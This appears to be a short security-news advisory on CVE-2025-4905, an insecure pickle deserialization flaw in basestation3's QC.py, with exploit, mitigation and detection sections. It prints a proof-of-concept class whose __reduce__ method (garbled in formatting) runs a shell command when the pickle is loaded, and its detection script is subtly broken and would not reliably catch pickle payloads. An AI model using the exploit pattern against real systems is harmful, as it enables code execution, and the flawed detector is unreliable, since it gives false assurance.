Listen to this Post
How CVE-2025-4905 Works
The vulnerability exists in the `load_qc_pickl` function within basestation3/QC.py, where unsafe deserialization occurs via the `qc_file` argument. Attackers can craft malicious pickle files to execute arbitrary code during deserialization. Since exploitation requires local access, attackers must first compromise user privileges. The CVSS 4.0 vector (AV:L/AC:L/PR:L) confirms the need for local system access. Despite being marked as closed, no patches or GitHub commits address the issue as of June 2025.
DailyCVE Form
Platform: iop-apl-uw basestation3
Version: <= 3.0.4
Vulnerability: Insecure deserialization
Severity: Medium
Date: 2025-06-12
Prediction: Patch expected 2025-08-30
What Undercode Say:
Analytics:
- Exploitability Index: 2.8 (Local privilege escalation likely)
- Affected Components: `QC.py` (QC module)
- Attack Surface: Limited to authenticated users
Exploit Commands:
import pickle
class Exploit:
def <strong>reduce</strong>(self):
return (exec, ('import os; os.system("id")',))
payload = pickle.dumps(Exploit())
with open("malicious_qc.pkl", "wb") as f:
f.write(payload)
Mitigation Commands:
1. Disable pickle deserialization:
Replace load_qc_pickl with safe JSON loader import json def load_qc_safe(qc_file): with open(qc_file, "r") as f: return json.load(f)
2. Apply strict file permissions:
chmod 600 /path/to/qc_files/.pkl
Detection Script:
import ast
def audit_pickle(file_path):
with open(file_path, "rb") as f:
try:
ast.literal_eval(f.read().decode())
except (SyntaxError, ValueError):
print(f"Warning: {file_path} may contain pickle payloads")
References:
- CPE: `cpe:2.3:a:iop-apl-uw:basestation3::::::::` (up to 3.0.4)
- CVSS:4.0/AV:L/AC:L/PR:L/UI:N/VC:L/VI:L/VA:L
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
